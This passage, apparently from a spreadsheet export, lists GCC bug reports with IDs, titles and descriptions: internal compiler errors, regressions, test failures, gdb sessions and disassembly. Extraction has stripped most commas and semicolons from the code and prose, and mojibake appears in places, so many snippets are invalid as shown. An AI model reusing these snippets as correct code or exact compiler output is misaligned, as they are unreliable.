#18 0x8328a79 in toplev_main (argc=3 argv=0xbfbffaf8)
    at /u2/toolchain/gcc/gcc/toplev.c:4524
#19 0x80f6682 in main (argc=3 argv=0xbfbffaf8)
    at /u2/toolchain/gcc/gcc/main.c:35
#20 0x8049a94 in ___start ()
line 664 is returning a bogus value for vec
664           rtvec vec = XVEC (tmp GET_CODE (tmp) == ADDR_DIFF_VEC)
(gdb) print vec
$1 = 0x85
(gdb) print debug_rtx (jump_insn)
(jump_insn 131 130 15 0 /tmp/x.c:9 (set (pc)
        (if_then_else (leu (minus:SI (reg:SI 0 %r0 [orig:69 fmt ] [69])
                    (const_int 71 [0x47]))
                (const_int 38 [0x26]))
            (plus:SI (sign_extend:SI (mem:HI (plus:SI (mult:SI (minus:SI (reg:SI 0 %r0 [orig:69 fmt ] [69])
                                    (const_int 71 [0x47]))
                                (const_int 2 [0x2]))
                            (pc)) [0 S2 A8]))
                (label_ref:SI 132))
            (pc))) 142 {casesi1} (insn_list 130 (nil))
    (expr_list:REG_DEAD (reg:SI 0 %r0 [orig:69 fmt ] [69])
        (nil)))
$2 = void
(gdb) print debug_rtx (tmp)
(jump_insn 133 132 0 /tmp/x.c:9 (addr_diff_vec:HI (label_ref:SI 132)
         [
            (label_ref:SI 15)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 52)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 70)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 36)
            (label_ref:SI 92)
            (label_ref:SI 36)
            (label_ref:SI 110)
        ]
        (const_int 0 [0x0])
        (const_int 0 [0x0])) -1 (nil)
    (nil))
$3 = void</t>
  </si>
  <si>
    <t>GCC-25622</t>
  </si>
  <si>
    <t>undefined reference to `_gfortran_st_set_nml_var_dim'</t>
  </si>
  <si>
    <t>A number of new fails have arisen on this target:
WARNING: gfortran.dg/namelist_11.f  -O0  compilation failed to produce executabl
e
WARNING: gfortran.dg/namelist_11.f  -O1  compilation failed to produce executabl
e
WARNING: gfortran.dg/namelist_11.f  -O2  compilation failed to produce executabl
e
WARNING: gfortran.dg/namelist_11.f  -O3 -fomit-frame-pointer  compilation failed
 to produce executable
...
Executing on host: /home/dave/gnu/gcc-4.0/objdir/gcc/testsuite/../gfortran -B/ho
me/dave/gnu/gcc-4.0/objdir/gcc/testsuite/../ /home/dave/gnu/gcc-4.0/gcc/gcc/test
suite/gfortran.dg/namelist_11.f   -O3 -g   -pedantic-errors  -L/home/dave/gnu/gc
c-4.0/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.0/objdir/hppa
-linux/./libiberty  -lm   -o ./namelist_11.exe    (timeout = 300)
/tmp/cc6CVY2t.o: In function `MAIN__':/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/g
fortran.dg/namelist_11.f:33: undefined reference to `_gfortran_st_set_nml_var'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:33: undefine
d reference to `_gfortran_st_set_nml_var_dim'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:33: undefine
d reference to `_gfortran_st_set_nml_var'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:42: undefine
d reference to `_gfortran_st_set_nml_var'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:42: undefine
d reference to `_gfortran_st_set_nml_var_dim'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:42: undefine
d reference to `_gfortran_st_set_nml_var'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:46: undefine
d reference to `_gfortran_st_set_nml_var'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:46: undefine
d reference to `_gfortran_st_set_nml_var_dim'
:/home/dave/gnu/gcc-4.0/gcc/gcc/testsuite/gfortran.dg/namelist_11.f:46: undefine
d reference to `_gfortran_st_set_nml_var'
collect2: ld returned 1 exit status
compiler exited with status 1
Previous build 
didn't exhibit this failure.</t>
  </si>
  <si>
    <t>GCC-23746</t>
  </si>
  <si>
    <t>m32c.h has a typo</t>
  </si>
  <si>
    <t>gcc/config/m32c/m32c.h contains:
#define TRAMPOLINE_ALIGMNENT m32c_trampoline_alignment ()
Note the misspelled ALIGMNENT.</t>
  </si>
  <si>
    <t>GCC-29532</t>
  </si>
  <si>
    <t>[4.1 regression] test suite failures</t>
  </si>
  <si>
    <t>comparing the 20061007 and the 20061020 build on amd64-linux-gnu I see the following regressions (Debian amd64 unstable):
+FAIL: gfortran.dg/io_constraints_1.f90  -O   (test for errors line 73)
+FAIL: gfortran.dg/io_constraints_1.f90  -O  (test for excess errors)
  Matthias</t>
  </si>
  <si>
    <t>GCC-3850</t>
  </si>
  <si>
    <t>gcc 2.73-3.0  code generation on HP and SUN WRONG</t>
  </si>
  <si>
    <t>The code generation for example printf function call
is wrong: ( it is not printf specific ! )
int a
printf(a=%d a=%d (a=1a) (a=2a))
The expected output shall be : a=1 a=2
But this works only on a x86  both UII and HP PA fails.
I was dissassembling it and found that ALL Gcc we have 
create ONE memory reference for variable 'a'. 
I was doublechecking with HP 'cc' and it created correctly
2 memory references thus displaying the expected result.
Linux is applying a 'pushd' before loading '2' to %eax.
This also works and the example above works correctly.
Release:
unknown
Environment:
On HP: HPUX 10.20 PA85000	
ON SUN: Solaris 2.6 UII
How-To-Repeat:
gcc mini.c -g
gdb a.out
disassemble</t>
  </si>
  <si>
    <t>GCC-9287</t>
  </si>
  <si>
    <t>[parser] [3.4 regression] g++ rejects static member in-class initialization of type `const char* const'</t>
  </si>
  <si>
    <t>gcc 3.3 did not reject the code but then again I do not know the c++ standard that well:
class temp
{
public:
static const char* const temp2 = temp2
}
Release:
GNU C++ version 3.4 20030109 (experimental)
Environment:
powerpc-apple-darwin6.3
How-To-Repeat:
compile the code with 3.4</t>
  </si>
  <si>
    <t>GCC-44615</t>
  </si>
  <si>
    <t>-mtune=atom failed on sse2-vec-2.c and amd64-abi-3.c</t>
  </si>
  <si>
    <t>On Linux/x86-64 I got
FAIL: gcc.target/i386/amd64-abi-3.c scan-assembler subq[\\t ]*\\$88[\\t ]*%rsp
FAIL: gcc.target/i386/sse2-vec-2.c (internal compiler error)
FAIL: gcc.target/i386/sse2-vec-2.c (test for excess errors)
with -mtune=atom.</t>
  </si>
  <si>
    <t>GCC-35939</t>
  </si>
  <si>
    <t>maxloc_bounds_[457].f90 fail with -fdefault-integer-8</t>
  </si>
  <si>
    <t>When compiled with -fdefault-integer-8 maxloc_bounds_[457].f90 give the following error:
/opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/maxloc_bounds_4.f90:19.11:
  call foo(res)
          1
Error: Type mismatch in argument 'res' at (1) passed INTEGER(4) to INTEGER(8)
A possible fix is to apply a patch such as:
--- /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/maxloc_bounds_4.f90   2008-02-25 10:57:38.000000000 +0100
+++ maxloc_bounds_4_db.f90      2008-04-14 22:31:25.000000000 +0200
@@ -57 +57 @@
 contains
   subroutine foo(res)
     integer(kind=4) allocatable :: f(::)
-    integer dimension(:) :: res
+    integer(kind=4) dimension(:) :: res
     allocate (f(25))
     f = 3
     res = maxloc(f)
or
--- /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/maxloc_bounds_4.f90   2008-02-25 10:57:38.000000000 +0100
+++ maxloc_bounds_4_db_1.f90    2008-04-14 22:48:38.000000000 +0200
@@ -47 +47 @@
 module tst
 contains
   subroutine foo(res)
-    integer(kind=4) allocatable :: f(::)
+    integer allocatable :: f(::)
     integer dimension(:) :: res
     allocate (f(25))
     f = 3
@@ -157 +157 @@
 program main
   use tst
   implicit none
-  integer(kind=4) :: res(3)
+  integer :: res(3)
   call foo(res)
 end program main
 ! { dg-output Fortran runtime error: Incorrect extent in return value of MAXLOC intrnisic: is 3 should be 2 }
in order to have consistent integer definitions.</t>
  </si>
  <si>
    <t>GCC-80359</t>
  </si>
  <si>
    <t>[7 Regression] DSE causes error: invalid reference prefix</t>
  </si>
  <si>
    <t>Created attachment 41153
C source code
common-filters.c: In function â€˜rtf_create_bandpass_analyticâ€™:
common-filters.c:643:9: error: invalid reference prefix
MEM[base: _429 offset: 0B]
common-filters.c:95:7: note: in statement
# .MEM_261 = VDEF 
IMAGPART_EXPR  = 0.0
common-filters.c:643:9: error: invalid reference prefix
MEM[base: _438 offset: 0B]
common-filters.c:95:7: note: in statement
# .MEM_259 = VDEF 
IMAGPART_EXPR  = 0.0
common-filters.c:643:9: internal compiler error: verify_gimple failed
0xc737e2 verify_gimple_in_cfg(function* bool)
	../../trunk/gcc/tree-cfg.c:5266
0xb00366 execute_function_todo
	../../trunk/gcc/passes.c:1966
0xb02aa4 do_per_function
	../../trunk/gcc/passes.c:1650
0xb02aa4 execute_todo
	../../trunk/gcc/passes.c:2016
gcc is recent trunk
$ ../results/bin/gcc -v
Using built-in specs.
COLLECT_GCC=../results/bin/gcc
COLLECT_LTO_WRAPPER=/home/dcb/gcc/results.246752/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../trunk/configure --prefix=/home/dcb/gcc/results.246752 --disable-bootstrap --disable-multilib --disable-werror --enable-checking=dfextrafoldrtlyes --enable-languages=cc++fortran
Thread model: posix
gcc version 7.0.1 20170407 (experimental) (GCC) 
I'll have a go at reducing the file.</t>
  </si>
  <si>
    <t>GCC-71186</t>
  </si>
  <si>
    <t>PowerPC64: Autovectorised code hits ICE with -O3 -mpower9 -mlra</t>
  </si>
  <si>
    <t>The following testcase:
static unsigned short x[(16384/sizeof(unsigned short))] __attribute__ ((aligned (16)))
static unsigned short y[(16384/sizeof(unsigned short))] __attribute__ ((aligned (16)))
static unsigned short a
void obfuscate(void *a ...)
static void __attribute__((noinline)) do_one(void)
{
 unsigned long i
 obfuscate(x y 
 for (i = 0 i &lt; (16384/sizeof(unsigned short)) i++)
  y[i] = a * x[i]
 obfuscate(x y 
}
int main(void)
{
 unsigned long i
 for (i = 0 i &lt; 1000000 i++)
  do_one()
 return 0
}
built with:
gcc -O3 -Wall -mcpu=power9 -mlra testcase.c
gets an ICE:
scale_unsigned_short.c: In function â€˜do_oneâ€™:
scale_unsigned_short.c:17:1: error: insn does not satisfy its constraints:
 }
 ^
(insn 81 43 86 3 (set (reg:V8HI 77 0 [199])
        (vec_duplicate:V8HI (const_int 0 [0]))) scale_unsigned_short.c:14 1045 {xxspltib_v8hi_nosplit}
     (expr_list:REG_EQUIV (const_vector:V8HI [
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
                (const_int 0 [0])
            ])
        (nil)))
scale_unsigned_short.c:17:1: internal compiler error: in extract_constrain_insn at recog.c:2190
0x108211f3 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:108
0x1082124b _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:119
0x107e6f57 extract_constrain_insn(rtx_insn*)
	../../gcc/gcc/recog.c:2190
0x106d5137 check_rtl
	../../gcc/gcc/lra.c:2022
0x106daa8f lra(_IO_FILE*)
	../../gcc/gcc/lra.c:2432
0x1067abab do_reload
	../../gcc/gcc/ira.c:5381
0x1067abab execute
	../../gcc/gcc/ira.c:5565</t>
  </si>
  <si>
    <t>GCC-16842</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] mkheaders can not find mkheaders.conf</t>
  </si>
  <si>
    <t>The mkheaders script does not find the mkheaders.conf file because it is using
an incorrect path to the conf file.
My build uses $prefix/lib/gcc/... instead of in the older releases
$prefix/lib/gcc-lib/... so the $prefix/libexec/.../mkheaders tries to read
using the old path.
So I changed the 
libsubdir=${libdir}/gcc-lib/${target_noncanonical}/${version}
line in libexec/gcc/i386-pc-solaris2.9/3.4.1/install-tools/mkheaders to
libsubdir=${libdir}/gcc/${target_noncanonical}/${version}
and it seems to work alright.</t>
  </si>
  <si>
    <t>GCC-11672</t>
  </si>
  <si>
    <t>[3.3 regression] ICE on template instantiation in erroneous source.</t>
  </si>
  <si>
    <t>The following snippet of erroneous source code crashes the
gcc-3.3 compiler. I tried on various systems. It seems to
crash on x86 and sparc and to issue the proper error message:
bumm.cc: In constructor `A::A() [with T = void]':
bumm.cc:9:   instantiated from here
bumm.cc:6: `void' is not an aggregate type
on PowerPC based systems.
--------------------------------------
template 
class A
{
  int n
public:
  A() : n (T::foo()) {}
}
A a
-------------------------------------
Here is a run on my FreeBSD system. This specific compiler was
bootstrapped with
BOOT_CFLAGS=-pipe -O2 -fomit-frame-pointer -mpreferred-stack-boundary=2
-march=athlon-tbird
merkur:~/cc/tmp$ gcc -v -S bumm.cc
Reading specs from /opt/gnu/bin/../lib/gcc-lib/i386-unknown-freebsd4.8/3.3/specs
Configured with: /pub/unpacked/gcc-3.3/configure --prefix=/opt/gnu/gcc-3.3
--disable-shared
Thread model: posix
gcc version 3.3
 /opt/gnu/bin/../lib/gcc-lib/i386-unknown-freebsd4.8/3.3/cc1plus -quiet -v
-iprefix /opt/gnu/bin/../lib/gcc-lib/i386-unknown-freebsd4.8/3.3/ -D__GNUC__=3
-D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 bumm.cc -D__GNUG__=3 -quiet -dumpbase
bumm.cc -auxbase bumm -version -o bumm.s
GNU C++ version 3.3 (i386-unknown-freebsd4.8)
        compiled by GNU C version 3.3.
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=65137
ignoring nonexistent directory
/opt/gnu/lib/gcc-lib/../../i386-unknown-freebsd4.8/include
ignoring nonexistent directory /opt/gnu/gcc-3.3/i386-unknown-freebsd4.8/include
ignoring duplicate directory /opt/gnu/gcc-3.3/include/c++/3.3
ignoring duplicate directory
/opt/gnu/gcc-3.3/include/c++/3.3/i386-unknown-freebsd4.8
ignoring duplicate directory /opt/gnu/gcc-3.3/include/c++/3.3/backward
ignoring duplicate directory
/opt/gnu/gcc-3.3/lib/gcc-lib/i386-unknown-freebsd4.8/3.3/include
#include ... search starts here:
#include  search starts here:
 /opt/gnu/lib/gcc-lib/../../include/c++/3.3
 /opt/gnu/lib/gcc-lib/../../include/c++/3.3/i386-unknown-freebsd4.8
 /opt/gnu/lib/gcc-lib/../../include/c++/3.3/backward
 /opt/gnu/lib/gcc-lib/i386-unknown-freebsd4.8/3.3/include
 /usr/local/include
 /opt/gnu/gcc-3.3/include
 /usr/include
End of search list.
bumm.cc: In constructor `A::A() [with T = void]':
bumm.cc:9:   instantiated from here
bumm.cc:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
merkur:~/cc/tmp$</t>
  </si>
  <si>
    <t>GCC-17923</t>
  </si>
  <si>
    <t>[4.0 Regression] const-str-[34].m fails on the mainline (next runtime)</t>
  </si>
  <si>
    <t>Patch here: .
The objc part was approved but needs someone to look over the other part.</t>
  </si>
  <si>
    <t>GCC-71442</t>
  </si>
  <si>
    <t>[5/6/7 Regression] r232569 breaks -Wunused-*</t>
  </si>
  <si>
    <t>// { dg-do compile { target c++11 } }
// { dg-options -Wunused-variable }
struct C
{
  template
  int operator()(Ts &amp;&amp;...)
  {
    return sizeof...(Ts)
  }
}
int
main ()
{
  C {} (1 1L 1LL 1.0)
  char a		// { dg-warning unused variable }
  short b		// { dg-warning unused variable }
  int c		// { dg-warning unused variable }
  long d		// { dg-warning unused variable }
  long long e		// { dg-warning unused variable }
  float f		// { dg-warning unused variable }
  double g		// { dg-warning unused variable }
}
FAILs to diagnose c d e and g vars as unused starting with r323569 because it marks not just decls as TREE_USED but also types and when e.g. int type is TREE_USED then all vars/parameters with that type are also considered TREE_USED.</t>
  </si>
  <si>
    <t>GCC-31662</t>
  </si>
  <si>
    <t>Can't boostrap current gcc trunk with libjava</t>
  </si>
  <si>
    <t>Originally reported at http://gcc.gnu.org/ml/gcc/2007-04/msg00539.html
bootstrap fails with a redefinition error for the macro _EXFUN.
In file included from ../../../gcc/libjava/classpath/native/fdlibm/fdlibm.h:29
                from ../../../gcc/libjava/java/lang/natVMDouble.cc:27:
../../../gcc/libjava/classpath/native/fdlibm/mprec.h:297:1: error:
_EXFUN redefined
In file included from /usr/include/stdlib.h:10
                from ../../../gcc/libjava/java/lang/natVMDouble.cc:14:
/usr/include/_ansi.h:36:1: error: this is the location of the previous
definition
make[3]: *** [java/lang/natVMDouble.lo] Error 1
  The problem is that cygwin (and presumably other newlib-based targets) supply
the _ansi.h compatibility header from newlib's include dir as a system header.
This defines _EXFUN and a number of other K'n'R-vs-C89 compatibility macros.
  When mprec.h was imported (from newlib possibly indirectly via the classpath project) it was necessary to supply equivalents to these macros that would allow it to build on a non-newlib system.  This decision makes sense because removing the macros and ANSI-fying the source would make future imports/merges very tricky.  However it leads to the redefinition problem on newlib targets mentioned above.
  I am testing a patch that wraps the compatibility definitions in mprec.h in #ifndef.  This is preferable to #undef'ing them as it defers to the system's own definitions (in cygwin's case this include the __cdecl declarator).</t>
  </si>
  <si>
    <t>GCC-27005</t>
  </si>
  <si>
    <t>program hangs when compiled with -O</t>
  </si>
  <si>
    <t>I am using gcc 3.4.3 on solais 10. 
g++ -v:
Reading specs from /usr/sfw/lib/gcc/i386-pc-solaris2.10/3.4.3/specs
Configured with: /builds/sfw10-gate/usr/src/cmd/gcc/gcc-3.4.3/configure --prefix=/usr/sfw --with-as=/usr/sfw/bin/gas --with-gnu-as --with-ld=/usr/ccs/bin/ld --without-gnu-ld --enable-languages=cc++ --enable-shared
Thread model: posix
gcc version 3.4.3 (csl-sol210-3_4-branch+sol_rpath)
If I compile the code with
% g++ reduced.C
and run it it returns as expected. The output is
% ./a.out
-NaN
If I compile it with optimization
% g++ reduced.C -O
and run it it does not return!
If I remove the unused function from the code the problem disappears. If I 
change the functions definition to take vector instead of a vector
the problem disappears.</t>
  </si>
  <si>
    <t>boris.breidenbach</t>
  </si>
  <si>
    <t>GCC-52039</t>
  </si>
  <si>
    <t>gcc/gimplify.o differs</t>
  </si>
  <si>
    <t>On MacOSX (x86_64-apple-darwin11.2.0) with the last snapshot (gcc-4.7-20120128)
i obtain gcc/gimplify.o differs and the bootstrap stops.
If i include gcc/gimplify.o within compare_exclusions (in configure) the
bootstrap succeeds and all seems OK.
The snapshot of last week (gcc-4.7-20120121) was OK.
See also PR47016.</t>
  </si>
  <si>
    <t>GCC-45324</t>
  </si>
  <si>
    <t>gcc.target/i386/volatile-bitfields-1.c doesn't work with i586-linux</t>
  </si>
  <si>
    <t>When gcc is configured with i586-linux I got
FAIL: gcc.target/i386/volatile-bitfields-1.c scan-assembler movzbl.*bits
I don't see anything wrong with
	.cfi_startproc
	movb	bits %al
	sarb	%al
	movsbl	%al %eax
	ret
	.cfi_endproc
I think we should also check movb.</t>
  </si>
  <si>
    <t>GCC-17469</t>
  </si>
  <si>
    <t>Testsuite in libstdc++ overrides LD_LIBRARY_PATH</t>
  </si>
  <si>
    <t>Testsuite in libstdc++ overrides LD_LIBRARY_PATH by using the global
ld_library_path which causes LD_LIBRARY_PATH to be set as
$ld_library_path.</t>
  </si>
  <si>
    <t>GCC-30094</t>
  </si>
  <si>
    <t>bogus use of CROSS_COMPILE in adaint.c</t>
  </si>
  <si>
    <t>adaint.c contains several lines like
#if defined (_WIN32) &amp;&amp; ! defined (__vxworks) &amp;&amp; ! defined (CROSS_COMPILE)
which although completely uncommented appear to be trying to detect whether or not the system has an _tfopen function or an fopen function.  The function is present on the target system independent of whether this file is being compiled on the target system or on say a linux system so testing CROSS_COMPILE here is inappropriate.</t>
  </si>
  <si>
    <t>GCC-7874</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 regression] g++ finds friend functions defined in class-definition but not declared in the enclosing namespace</t>
  </si>
  <si>
    <t>Ordinary name lookup rules are wrongly implemented: g++
should not find by ordinary name lookup rules friend
function names defined in class-definition and not declared
in the enclosing namespace.
This is a regression from 2.95.x
Release:
All 3.x series
Environment:
Plateform independent</t>
  </si>
  <si>
    <t>GCC-25258</t>
  </si>
  <si>
    <t>[4.0 regression/hpux] gcc generates incorrect stabs debug output</t>
  </si>
  <si>
    <t>Programs compiled with gcc-4.x on 32-bit hpux targets cannot be debugged. When loaded into gdb the programs behave as if no debugging information is present. 
For example given:
int foo(int x)
{
        return x
}
int main(int argc char **argv)
{
        return foo(argc)
}
Placing a breakpoint on foo gives:
(gdb) b foo
During symbol reading unknown symbol type 0x2e.
During symbol reading block end address less than block start address in main (patched it).
During symbol reading inner block (0x2960-0x2960) not inside outer block (0x2920-0x2920).
Breakpoint 1 at 0x292c
The unknown symbol type warning is for the new BNSYM stab entry that was added to gcc but not yet updated in gdb.
this problem seems to only occur on the 32-bit HPUX port. On 64-bit HPUX and 32-bit Linux there does not appear to be any problems with slabs debugging.</t>
  </si>
  <si>
    <t>CLASSPATH-23795</t>
  </si>
  <si>
    <t>Implement missing functions in BasicTreeUI MetalTreeUI and JTree</t>
  </si>
  <si>
    <t>Implement all that are missing.</t>
  </si>
  <si>
    <t>GCC-83813</t>
  </si>
  <si>
    <t>[GCOV] unsigned char in a union lead to incorrect coverage in gcov</t>
  </si>
  <si>
    <t># gcc-8 -v
Using built-in specs.
COLLECT_GCC=gcc-8
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/8/lto-wrapper
OFFLOAD_TARGET_NAMES=nvptx-none
OFFLOAD_TARGET_DEFAULT=1
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 8-20170923-1ubuntu2' --with-bugurl=file:///usr/share/doc/gcc-8/README.Bugs --enable-languages=cc++gobrigfortranobjcobj-c++ --prefix=/usr --with-gcc-major-version-only --program-suffix=-8 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --enable-objc-gc=auto --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-offload-targets=nvptx-none --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 8.0.0 20170923 (experimental) [trunk revision 253118] (Ubuntu 8-20170923-1ubuntu2)
# cat small.c
union U
{
    int f0
    unsigned char f1
}
int main()
{
    int i = 0
    union U u = {0}
    for (u.f1 = 0 u.f1 != -2 ++u.f1) {
        i ^= u.f1
        if (i &lt; 1)
            return 0
    }
    return 1
}
# gcc-8 small.c -fprofile-arcs -ftest-coverage ./a.out gcov-8 small.c cat small.c.gcov
File 'small.c'
Lines executed:85.71% of 7
Creating 'small.c.gcov'
        -:    0:Source:small.c
        -:    0:Graph:small.gcno
        -:    0:Data:small.gcda
        -:    0:Runs:1
        -:    0:Programs:1
        -:    1:union U
        -:    2:{
        -:    3:    int f0
        -:    4:    unsigned char f1
        -:    5:}
        -:    6:
        1:    7:int main()
        -:    8:{
        1:    9:    int i = 0
        1:   10:    union U u = {0}
        1:   11:    for (u.f1 = 0 u.f1 != -2 ++u.f1) {
    #####:   12:        i ^= u.f1
        1:   13:        if (i &lt; 1)
        1:   14:            return 0
        -:   15:    }
        -:   16:
        -:   17:    return 1
        -:   18:}
Line #12 is wrongly marked as not executed. While change f1's type as int or unsigned int the coverage is correct.</t>
  </si>
  <si>
    <t>yangyibiao</t>
  </si>
  <si>
    <t>GCC-11854</t>
  </si>
  <si>
    <t>-fdata-sections put everything into the data section not BSS</t>
  </si>
  <si>
    <t>~$ cat bss.c
int foo
static int bar
int fred=1
~$ /opt/ecos/gnutools/mips64vr-elf-3.3.1/bin/mips64vr-elf-gcc -save-temps -o
bss.o -c bss.c -fdata-sections
~$ cat bss.s 
        .file   1 bss.c
        .section .mdebug.abiO64
        .previous
        .globl  fred
        .section        .sdata.fredaw@progbits
        .align  2
        .type   fred @object
        .size   fred 4
fred:
        .word   1
        .globl  foo
        .section        .data.fooaw@progbits
        .align  2
        .type   foo @object
        .size   foo 4
foo:
        .space  4
        .section        .data.baraw@progbits
        .align  2
        .type   bar @object
        .size   bar 4
bar:
        .space  4
foo and bar should be in the bss but with -fdata-section they end up in the
data section making the executable binary huge and mostly 0's</t>
  </si>
  <si>
    <t>andrew.lunn</t>
  </si>
  <si>
    <t>GCC-7856</t>
  </si>
  <si>
    <t>[arm] invalid offset in constant pool reference</t>
  </si>
  <si>
    <t>Build the attached file with -O3 -fPIC.  The assembler chokes on the resulting code with:
/home/pb/unicodectype.s:9735: Error: illegal value for co-processor offset
/home/pb/unicodectype.s:9760: Error: illegal value for co-processor offset
The offending lines are of the form
        ldfeqd  f0 .L185
and
        ldfeqd  f0 .L185+8
This is a regression from GCC 3.0
Release:
gcc 3.2
Environment:
arm-linux</t>
  </si>
  <si>
    <t>GCC-44852</t>
  </si>
  <si>
    <t>[4.6 Regression]: miscompilation (of e.g. newlib dtoa.c) after mem-ref2 merge</t>
  </si>
  <si>
    <t>Revision 161654 compiles the attached test-case correctly at -O2.
Revision 161655 does not (except at -O0).
I guess the bug is apparent for other targets too but I haven't checked.
Note for cris-elf this bb correctly compiled (path for *s = '0' to sf return):
.L7:
        move.b 48$r13
        move.b $r13[$r11]
        addq 1$r13
        ret
        move.b $r13[$r9]
and incorrectly:
.L7:
        move.b 48$r9
        move.b $r9[$r10-1]
        addq 10$r9
        move.b $r9[$r10-1]
        ret
        nop
(storing '0' and then adding 10 to it making ':')
The test-case is distilled from newlib/libc/stdlib/dtoa.c where the bug causes a store of ':' directly without bothering to first store '0' :) but apparently the same bug.
The miscompilation is exposed as regressions in three fortran test-cases from r161655 and on up to and including at least r161893:
Running /tmp/regress-0630-55/gcc/gcc/testsuite/gfortran.dg/dg.exp ...
... (non-regressions elided)
FAIL: gfortran.dg/edit_real_1.f90  -O0  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O1  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O2  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O3 -fomit-frame-pointer  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
FAIL: gfortran.dg/edit_real_1.f90  -O3 -g  execution test
FAIL: gfortran.dg/edit_real_1.f90  -Os  execution test
FAIL: gfortran.dg/fmt_float.f90  -O0  output pattern test is             0.10E+01            0.10E+00            0.:0E\
(...verbosity elided but note the : there's a 1 expected there)
FAIL: gfortran.dg/fmt_float.f90  -O1  output pattern test is             0.10E+01            0.10E+00            0.:0E\
(...further similar fmt_float results elided)
FAIL: gfortran.dg/fmt_zero_precision.f90  -O0  output pattern test is  1.&lt;
(...verbosity elided)
FAIL: gfortran.dg/fmt_zero_precision.f90  -O1  output pattern test is  1.&lt;
(...further similar fmt_zero_precision results elided)</t>
  </si>
  <si>
    <t>GCC-8706</t>
  </si>
  <si>
    <t>gcc cannot generate __cdel functions that can be called by Visual C if that function returns &gt;8 byte strucutres by value</t>
  </si>
  <si>
    <t>I've narrowed down the bug to a simple case.  If a function returns a structure that has a size &gt; 8 bytes the GCC and Microsoft Visual C compilers create functions that are not compatible.  They work just fine on their own but if you try calling one from the other it would corrupt the stack.  Is this a known issue or there is a workaround?
If you compile the following test code:
--test.c begin--
typedef struct { int barxy } Foo
Foo ret_test(void)
{
	Foo ret
	ret.bar = 0
	return ret
} 
int main(char* argc int argv)
{
	Foo ret = ret_test()
	return ret.bar
}
--test.c end--
You get the following from GCC:
--gcc output begin--
Dump of file test.o by objdump
File Type: COFF OBJECT
_ret_test:
  00000000: 55                 push        ebp
  00000001: 89 E5              mov         ebpesp
  00000003: 83 EC 18           sub         esp18h
  00000006: 8B 45 08           mov         eaxdword ptr [ebp+8]
  00000009: C7 45 F0 00 00 00  mov         dword ptr [ebp-10h]offset _ret_test
            00
  00000010: 8B 55 F0           mov         edxdword ptr [ebp-10h]
  00000013: 89 10              mov         dword ptr [eax]edx
  00000015: 8B 55 F4           mov         edxdword ptr [ebp-0Ch]
  00000018: 89 50 04           mov         dword ptr [eax+4]edx
  0000001B: 8B 55 F8           mov         edxdword ptr [ebp-8]
  0000001E: 89 50 08           mov         dword ptr [eax+8]edx
  00000021: EB 00              jmp         00000023
  00000023: 89 C0              mov         eaxeax
  00000025: 89 EC              mov         espebp
  00000027: 5D                 pop         ebp
  00000028: C2 04 00           ret         4
  0000002B: 90                 nop
_main:
